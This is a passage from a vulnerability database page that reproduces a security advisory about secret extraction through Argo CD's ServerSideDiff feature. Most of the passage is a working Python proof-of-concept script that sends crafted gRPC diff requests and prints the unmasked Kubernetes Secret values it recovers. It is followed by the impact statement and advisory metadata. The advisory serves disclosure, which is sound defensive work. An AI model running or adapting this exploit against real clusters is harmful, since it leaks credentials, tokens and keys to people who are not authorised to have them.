     if k8s_annots:\n                    target[\"metadata\"][\"annotations\"] = k8s_annots\n            except Exception:\n                pass\n\n        # for TLS secrets, include required placeholder keys\n        if stype == \"kubernetes.io/tls\":\n            target[\"data\"] = {\n                \"tls.crt\": base64.b64encode(b\"PLACEHOLDER\").decode(),\n                \"tls.key\": base64.b64encode(b\"PLACEHOLDER\").decode(),\n            }\n        elif stype == \"kubernetes.io/dockerconfigjson\":\n            target[\"data\"] = {\".dockerconfigjson\": base64.b64encode(b\u0027{\"auths\":{}}\u0027).decode()}\n\n        # encode the grpc request\n        lr = b\"\"\n        lr += encode_str(2, \"Secret\")       # kind\n        lr += encode_str(3, sns)             # namespace\n        lr += encode_str(4, sname)           # name\n        if live_json:\n            lr += encode_str(6, live_json)   # liveState\n        lr += encode_bool(12, True)          # modified\n\n        query = encode_str(1, app_name)\n        query += encode_str(3, project)\n        query += encode_bytes(4, lr)\n        query += encode_str(5, json.dumps(target))\n\n        # reconnect for each call (simple, no pool needed for poc)\n        try:\n            conn = make_conn(host)\n            resp_data, err = grpc_post(conn, token, query)\n        except Exception as e:\n            print(\"  [!] %s/%s: %s\" % (sns, sname, e))\n            continue\n        if err:\n            print(\"  [!] %s/%s: %s\" % (sns, sname, err))\n            continue\n\n        # parse response\n        resp_fields = decode_fields(resp_data)\n        for item_bytes in resp_fields.get(1, []):\n            if not isinstance(item_bytes, bytes):\n                continue\n            ifields = decode_fields(item_bytes)\n\n            # field 5 = targetState (predictedLive \u2014 has real values from etcd)\n            for raw in ifields.get(5, []):\n                if not isinstance(raw, bytes):\n                    continue\n                try:\n                    obj = json.loads(raw)\n                except Exception:\n                    continue\n                if obj.get(\"kind\") != \"Secret\":\n                    continue\n                secret_data = obj.get(\"data\", {})\n                if not secret_data:\n                    continue\n\n                # check for real (non-masked) values\n                real_keys = {}\n                for k, v in secret_data.items():\n                    if not v:\n                        continue\n                    if all(c == \"+\" for c in v):\n                        continue  # masked by argocd\n                    try:\n                        decoded = base64.b64decode(v)\n                        text = decoded.decode(\"utf-8\", errors=\"replace\")\n                    except Exception:\n                        continue\n                    if all(c == \"+\" for c in text) and text:\n                        continue  # masked (base64 of +++...)\n                    real_keys[k] = text\n\n                if real_keys:\n                    total_extracted += 1\n                    print(\"\\n  [***] %s/%s  (%s)\" % (sns, sname, stype))\n                    print(\"        %d/%d keys extracted:\" % (len(real_keys), len(secret_data)))\n                    for k in sorted(real_keys):\n                        v = real_keys[k].replace(\"\\n\", \"\\\\n\")\n                        if len(v) \u003e 120:\n                            v = v[:120] + \"...\"\n                        print(\"          %s: %s\" % (k, v))\n\n    print(\"\\n[*] Done. %d secrets with real values extracted.\" % total_extracted)\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\nAny user with Argo CD application get permissions can extract real Kubernetes Secret values including service account tokens, TLS certificates, database credentials, and API keys. On Applications where IncludeMutationWebhook=true is already set, exploitation requires only read-only Argo CD access.",
  "id": "GHSA-3v3m-wc6v-x4x3",
  "modified": "2026-05-07T01:56:53Z",
  "published": "2026-05-07T01:56:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/argoproj/argo-cd"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ArgoCD ServerSideDiff is vulnerable to Kubernetes Secret Extraction"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42880 (GCVE-0-2026-42880)

FKIE_CVE-2026-42880

GHSA-3V3M-WC6V-X4X3

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature